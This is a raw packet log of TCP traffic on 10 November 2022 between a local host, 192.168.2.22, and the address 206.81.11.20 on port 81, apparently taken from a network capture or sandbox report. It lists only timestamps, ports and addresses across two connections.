Nov 10, 2022 11:43:11.405534029 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.405534983 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.405554056 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.405596018 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.405605078 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.405638933 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.405661106 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.405682087 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.405725002 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.405745029 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.405766964 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.405807972 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.405823946 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.405848026 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.405879974 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.405890942 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.405900002 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.405932903 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.405973911 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.405993938 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.406019926 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.406060934 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.406080008 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.406104088 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.406145096 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.406158924 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.406184912 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.406202078 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.406229973 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.406306982 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.406322002 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.406348944 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.406390905 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.406407118 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.406431913 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.406472921 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.406514883 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.406554937 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.406577110 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.406577110 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.406577110 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.406599045 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.406641006 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.406658888 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.406682014 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.406683922 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.406725883 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.406748056 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.406766891 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.406807899 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.406830072 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.406848907 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.406918049 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.406928062 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.406958103 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.406979084 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.407002926 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.407021046 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.407043934 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.407084942 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.407108068 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.407129049 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.407169104 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.407193899 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.407211065 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.407227993 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.407253027 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.407272100 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.407284021 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.407347918 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.435775042 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.435844898 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.435889006 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.435934067 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.435977936 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.436024904 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.436045885 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.436070919 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.436096907 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.436114073 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.436150074 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.436156988 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.436199903 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.436223030 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.436243057 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.436285019 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.436306953 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.436327934 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.436372995 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.436395884 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.436418056 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.436463118 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.436486006 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.436505079 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.436548948 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.436572075 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.436592102 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.436644077 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.436665058 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.436697006 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.436741114 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.436748028 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.436785936 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.436829090 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.436861038 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.436872005 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.436954021 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.436978102 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.436999083 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437043905 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437063932 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.437088013 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437135935 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437149048 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.437180996 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437225103 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437243938 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.437268972 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437311888 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437334061 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.437354088 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437396049 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437414885 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.437441111 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437483072 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437499046 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.437525988 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437566996 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437608957 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437624931 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.437650919 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437686920 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.437694073 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437736034 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437756062 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.437778950 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437822104 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437838078 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.437864065 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437905073 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437932014 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.437947035 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.437989950 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.438011885 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.438031912 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.438075066 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.438095093 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.438117981 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.438160896 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.438184023 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.438205004 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.438246012 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.438263893 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.438286066 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.438328028 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.438354015 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.438366890 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.438409090 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.438426018 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.438450098 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.438492060 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.438509941 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.438540936 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.438581944 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.438601971 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.438627958 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.438669920 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.438683987 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.438710928 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.438751936 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.438783884 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.438793898 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.438824892 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.438834906 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.438906908 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.438910007 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.438961029 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439007998 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439024925 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.439049959 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439094067 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439109087 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.439133883 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439174891 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439192057 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.439217091 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439259052 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439273119 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.439302921 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439344883 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439366102 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.439385891 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439428091 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439448118 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.439470053 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439512014 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439526081 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.439553976 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439595938 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439621925 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.439637899 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439680099 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439707994 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.439723015 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439764977 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439784050 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.439806938 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439850092 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439866066 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.439891100 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439933062 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.439949989 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.439975977 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.440020084 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.440037966 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.440062046 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.440104961 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.440123081 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.440146923 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.440191031 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.440208912 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.443566084 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.450992107 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.451062918 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.451150894 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.453193903 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.453254938 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.453336954 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.478409052 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.478437901 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.478456974 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.478475094 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.478493929 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.478513002 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.478529930 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.478547096 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.478564024 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.478576899 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.478578091 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.478585005 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.478602886 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.478610039 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.478622913 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.478637934 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.478640079 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.478658915 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.478676081 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.478677034 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.478703976 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.478722095 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.478828907 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.478863955 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.492139101 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.508757114 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.508829117 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.508872986 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.508913994 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.508954048 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.508996964 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.509017944 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.509017944 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.509040117 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.509068966 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.509078026 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.509115934 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.509140015 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.509171963 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.509213924 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.509237051 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.509253979 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.509279013 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.509294987 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.509335995 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.509345055 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.509378910 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.509419918 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.509428024 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.509474993 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.509510994 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.509563923 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.509607077 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.509613991 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.509646893 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.509686947 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.509696007 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.509732962 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.509778023 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.509784937 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.509820938 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.509862900 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.509871006 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.509903908 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.509946108 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.509953976 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.509985924 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.510032892 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.510046959 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.510073900 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.510117054 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.510123968 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.510160923 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.510202885 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.510212898 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.510245085 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.510288000 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.510310888 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.510328054 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.510368109 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.510385036 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.510409117 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.510451078 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.510458946 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.510493040 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.510533094 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.510544062 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.510574102 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.510616064 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.510624886 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.510657072 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.510698080 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.510708094 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.510740042 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.510791063 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.541863918 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.541919947 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.541955948 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.541990995 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542031050 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542064905 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542102098 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542136908 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542152882 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.542154074 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.542171001 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542205095 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542233944 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.542239904 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542273998 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.542275906 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542311907 CET	81	49171	206.81.11.20	192.168.2.22
